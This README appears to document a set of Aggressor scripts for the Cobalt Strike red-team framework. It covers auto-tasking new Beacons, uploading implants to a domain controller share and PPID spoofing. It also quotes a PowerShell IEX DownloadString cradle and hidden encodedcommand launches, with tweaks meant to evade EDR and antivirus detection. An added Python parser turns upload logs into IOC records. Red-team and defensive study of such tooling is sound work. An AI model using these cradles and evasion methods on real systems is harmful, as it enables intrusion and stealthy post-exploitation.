## cobalt-arsenal
My published set of Aggressor Scripts for Cobalt Strike 4.0+
- **`Beacon_Initial_Tasks.cna`** - This script lets you configure **commands that should be launched as soon as the Beacon checks in for the first time**. Both the commands and their argument settings are available in a dedicated options dialog. A right-click "Run custom command..." entry on a Beacon was also added so that arbitrary commands can be issued against multiple Beacons at once. Settings are then saved in the file specified by a global variable named:
`$beaconInitialTasksSettingsFile`
*How does it work?*
It implements `beacon_task()`, a routine that invokes nearly arbitrary Cobalt Strike commands from a passed string, from within your own Aggressor scripts:
```
beacon_task($bid, "execute-assembly C:\\tools\\Rubeus.exe hash /password:test");
```
- **`better-upload.cna`** - Simple yet **super handy** script that overrides the built-in `upload` command with one that accepts an additional second parameter, the _remote file path_. By default a file can only be uploaded to the Beacon's current working directory; this implementation lets us upload it wherever we like. Additionally, it computes and prints the MD5 checksum of every uploaded file to facilitate IOC tracking:
```
beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes
```
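An added example (not part of the repository) that consumes the `upload` console lines shown above and turns them into the IOC records an engagement log or blue-team handover needs: file hash, size, destination host and path, plus a check that the byte count Beacon reported covers the whole file. The sample console text is constructed from the README's own example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of the modified `upload` command's output; values copy the README example.
SAMPLE_CONSOLE = r"""beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes
"""

UPLOAD_RE = re.compile(
    r"Tasked Beacon to upload file \(size: (?P<size>[\d.]+)(?P<unit>[KMG]?B), "
    r"md5: (?P<md5>[0-9a-fA-F]{32})\) from: \((?P<src>.+?)\) to: \((?P<dst>.+)\)$"
)
SENT_RE = re.compile(r"host called home, sent: (?P<n>\d+) bytes")
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


@dataclass
class UploadIOC:
    md5: str
    size_bytes: int
    src: str
    dst: str
    sent_bytes: Optional[int] = None  # taken from the following "host called home" line

    @property
    def target_host(self) -> Optional[str]:
        # A UNC destination names the host that received the file; a local path is None.
        if self.dst.startswith("\\\\"):
            return self.dst[2:].split("\\", 1)[0] or None
        return None


def parse_upload_iocs(console_text: str) -> List[UploadIOC]:
    """One IOC record per upload, with the byte count Beacon reported afterwards."""
    records: List[UploadIOC] = []
    for line in console_text.splitlines():
        m = UPLOAD_RE.search(line.strip())
        if m:
            size = int(round(float(m["size"]) * UNITS[m["unit"]]))
            records.append(UploadIOC(m["md5"].lower(), size, m["src"], m["dst"]))
            continue
        s = SENT_RE.search(line)
        if s and records and records[-1].sent_bytes is None:
            records[-1].sent_bytes = int(s["n"])
    return records


def transfer_complete(rec: UploadIOC) -> bool:
    """Sent bytes include task framing, so a full upload sends at least the file size."""
    return rec.sent_bytes is not None and rec.sent_bytes >= rec.size_bytes
```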
- **`cwd-in-beacon-status-bar.cna`** - Simple Beacon console status bar enhancement showing the Beacon's last known current working directory, and giving the last-seen meter a fixed width. Additionally, this script extends the `cd` command so that `cd -` restores the previous path (when the previous path is known).
- **`custom-powershell-hooks.cna`** - This script introduces several alternative methods for the PowerShell download and execution primitives, replacing Cobalt Strike's default `(Net.WebClient).DownloadString` and `IEX()`:
```
set POWERSHELL_DOWNLOAD_CRADLE {
return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
}
[...]
set POWERSHELL_COMMAND {
[...]
return "powershell -nop -w hidden -encodedcommand $script";
}
```
The aforementioned methods are heavily flagged these days by EDRs and AVs, so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them excessively, generating a lot of noise in such systems. We can tell Cobalt Strike to structure its PowerShell usage patterns differently. However, some of the introduced custom methods may not work. In such situations, we can always switch back to the battle-tested Cobalt Strike defaults by setting `$USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2;` in the script's header.
- **`FilesColor.cna`** - Color-coded file listing. Similar to `ProcessColor.cna` by [@r3dQu1nn](https://github.com/harleyQu1nn/AggressorScripts), this script colorizes file listing output based on file type and extension. **It also tries to keep track of uploaded files so that they are highlighted in file listings as well**. The color scheme legend is shown only three times by default, unless configured otherwise via the global variable named `$TIMES_TO_DISPLAY_COLORS_SCHEME`.
![FilesColor example](https://raw.githubusercontent.com/mgeeky/cobalt-arsenal/master/img/1.PNG)
- **`Forwarded_Ports.cna`** - Keeps track of the remote port forwardings configured on all Beacons and lets you kill them easily. Available in `View -> Remote Forwarded Ports`.
Using `rportfwd` here and there quickly consumes the pool of available local ports from which to forward traffic outbound, and keeping track of them manually becomes tedious on long-haul projects. This script aims to fill that gap by collecting these commands and presenting them in a visualization pane (concept & implementation based on previous work of @ramen0x3f [leave_no_trace](https://github.com/ramen0x3f/AggressorScripts/blob/master/leave_no_trace.cna), @001SPARTaN and @r3dqu1nn [logvis.cna](https://github.com/invokethreatguy/AggressorCollection/blob/master/harleyQu1nn/logvis.cna)).
- **`hash.cna`** - Implementation of MD5/SHA1/SHA256 hashing routines in aggressor script.
- **`Highlight_Beacons.cna`** - Highlights Beacons for a specified duration (`$HIGHLIGHT_DURATION`) on the initial check-in event, when exiting (and after the Beacon has exited), and after each Beacon command's output. Configurable colors and events are found in the `%HIGHLIGHTS` dictionary. Hint: specify `output => ""` to disable highlighting of new Beacon command output.
- **`httprequest.cna`** - Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc., and follows redirections. Rationale: I've tested various implementations of HTTP request sending subroutines written in Sleep for CS, but none of them matched my needs - working support for GET/POST, redirection handling and exception-safe execution. So I came up with my own implementation. ([gist](https://gist.github.com/mgeeky/2d7f8c2a6ffbfd23301e1e2de0312087))
- **`Payload_Variants_Generator.cna`** - This script generates stageless payload variants per each available architecture and output format type. Compatible with Cobalt Strike 4.0+.
- **`parse-error-codes.cna`** - A handy script that parses reported error codes and prints their corresponding Windows-related meaning directly in the Beacon's console output.
**From:**
```
beacon> ls C:\gdgsdfgdf
[-] could not open C:\gdgsdfgdf\*: 3
```
**To:**
```
beacon> ls C:\gdgsdfgdf
[-] could not open C:\gdgsdfgdf\*: 3. Parsed error code:
3 - ERROR_PATH_NOT_FOUND
```
- **`rename-beacon-tabs.cna`** - Script that lets us rename Beacon-related tabs from the default format of `Beacon <ip>@<pid>` to anything else we like, for instance `B: <user>@<computer> (<pid>)`.
The format deciding how each Beacon's tab is named, built from the Beacon's metadata fields, is set in a global variable named `$beacon_tab_name_format`. That variable may contain any of the following Beacon metadata keys (Cobalt Strike 4.2):
`note, charset, internal, alive, session, listener, pid, lastf, computer, host,
is64, id, process, ver, last, os, barch, phint, external, port, build, pbid, arch,
user, _accent`
- **`settings.cna`** - Script that offers sample implementation for `saveOptions` and `loadOptions` routines, intended to store & restore settings from an external file.
- **`smart-autoppid.cna`** - Autoppid - a script that smartly invokes PPID for every new check-in of a Beacon. The PPID command requires the invoking Beacon to have the same integrity level as the process it wants to assume as its parent. That's due to how InitializeProcThreadAttributeList with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS works. To avoid a hardcoded explorer.exe PID assumption, the script looks for a configurable process name and then tries to find an instance of that process running at the highest integrity level available to us. Thus an unprivileged user would assume the PPID of, for instance, an svchost.exe running as that user, whereas a privileged one could go for the svchost.exe running as NT AUTHORITY\SYSTEM. The aim is to pick the most advantageous target dynamically.
The same command is also exposed as an alias:
```
beacon> autoppid
[*] Tasked Beacon to find svchost.exe running as SYSTEM and make it the PPID.
[.] host called home, sent: 12 bytes
Future post-ex jobs will be spawned with fake PPID set to:
svchost.exe 604 700 x64 NT AUTHORITY\SYSTEM 0
[*] Tasked beacon to spoof 700 as parent process
[.] host called home, sent: 12 bytes
```